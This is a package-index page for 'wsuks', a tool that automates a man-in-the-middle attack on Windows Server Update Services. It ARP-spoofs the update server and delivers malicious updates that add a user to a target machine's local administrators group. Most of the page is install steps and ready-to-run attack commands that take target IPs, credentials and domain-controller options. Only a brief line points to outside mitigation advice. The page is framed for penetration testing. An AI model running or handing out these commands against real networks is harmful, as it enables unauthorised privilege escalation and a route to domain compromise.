A Tool for automating the MITM attack on the WSUS connection
Project description
wsuks
Weaponizing the WSUS Attack
Gaining local administrative access on a Windows machine that is part of a domain is typically the initial step towards acquiring domain admin privileges during a penetration test. In order to exploit the WSUS attack automatically, this tool spoofs the IP address of the WSUS server within the network using ARP, and when the client requests Windows updates, it provides its own malicious updates instead. By default, a Windows client requests updates every 24 hours.
Both the executable file served (Default: PsExec64.exe) and the executed command can be changed as needed.
Prerequisits:
- The target Client must be on the local network
- The Windows Server Update Service (WSUS) must be configured using HTTP
Result:
- After successful execution the user provided will be added to the local admin group. If no user was specified a user with the format user[0-9]{5} (e.g. user12345) and a random password will be created
Installation
Using pipx:
sudo apt install python3-pipx
pipx ensurepath
pipx install wsuks
sudo ln -s ~/.local/pipx/venvs/wsuks/bin/wsuks /usr/local/bin/wsuks
Using poetry:
sudo apt install python3-poetry
git clone https://github.com/NeffIsBack/wsuks
cd wsuks
sudo poetry install
Usage
❗wsuks must be run as root❗
With pipx:
sudo wsuks
suso wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20 # This will generate a new local user and add it to the local admin group
sudo wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20 -u User -p Password -d Domain.local # This will add the provided user to the local admin group
sudo wsuks -t 10.0.0.10 -u User -p Password -d Domain.local --dc-ip 10.0.0.1 # This will start the auto discovery mode and add the provided user to the local admin group
With poetry:
suso poetry run wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20 # This will generate a new local user and add it to the local admin group
sudo poetry run wsuks -t 10.0.0.10 --WSUS-Server 10.0.0.20 -u User -p Password -d Domain.local # This will add the provided user to the local admin group
sudo poetry run wsuks -t 10.0.0.10 -u User -p Password -d Domain.local --dc-ip 10.0.0.1 # This will start the auto discovery mode and add the provided user to the local admin group
About & Mitigation
In the PyWSUS Repository from GoSecure you can find a great documentation how to you could detect and mitigate this attack. They also wrote a great Guide demonstrating how this attack works in detail here.
This Tool is based on the following projects:
Download files
Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
Source Distribution
Built Distribution
File details
Details for the file wsuks-0.4.1.tar.gz.
File metadata
- Download URL: wsuks-0.4.1.tar.gz
- Upload date:
- Size: 762.1 kB
- Tags: Source
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/1.3.2 CPython/3.11.4 Linux/6.1.0-kali9-amd64
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | b0ac8554c8e70a2bd714db991bfaf65e99d614211e2af667b89760b36430b535 |
|
| MD5 | 31357ce1c7cd8b2d70765bb3c74d1a28 |
|
| BLAKE2b-256 | 810f381b16587eace9d53970173b294d0a73569c9089f1578eda4580172cd5ef |
File details
Details for the file wsuks-0.4.1-py3-none-any.whl.
File metadata
- Download URL: wsuks-0.4.1-py3-none-any.whl
- Upload date:
- Size: 769.0 kB
- Tags: Python 3
- Uploaded using Trusted Publishing? No
- Uploaded via: poetry/1.3.2 CPython/3.11.4 Linux/6.1.0-kali9-amd64
File hashes
| Algorithm | Hash digest | |
|---|---|---|
| SHA256 | 2656a565d53aef5837fb92d56af5c566a3ce224cb6dfec710cb9cbb3a2519cb4 |
|
| MD5 | 4fa676fc11f380962b7bd8f70452a16e |
|
| BLAKE2b-256 | 4b02af0f27aa4ce42e5be168033b6a6aca256f0a3abc69ed6650c4bfeb1368aa |
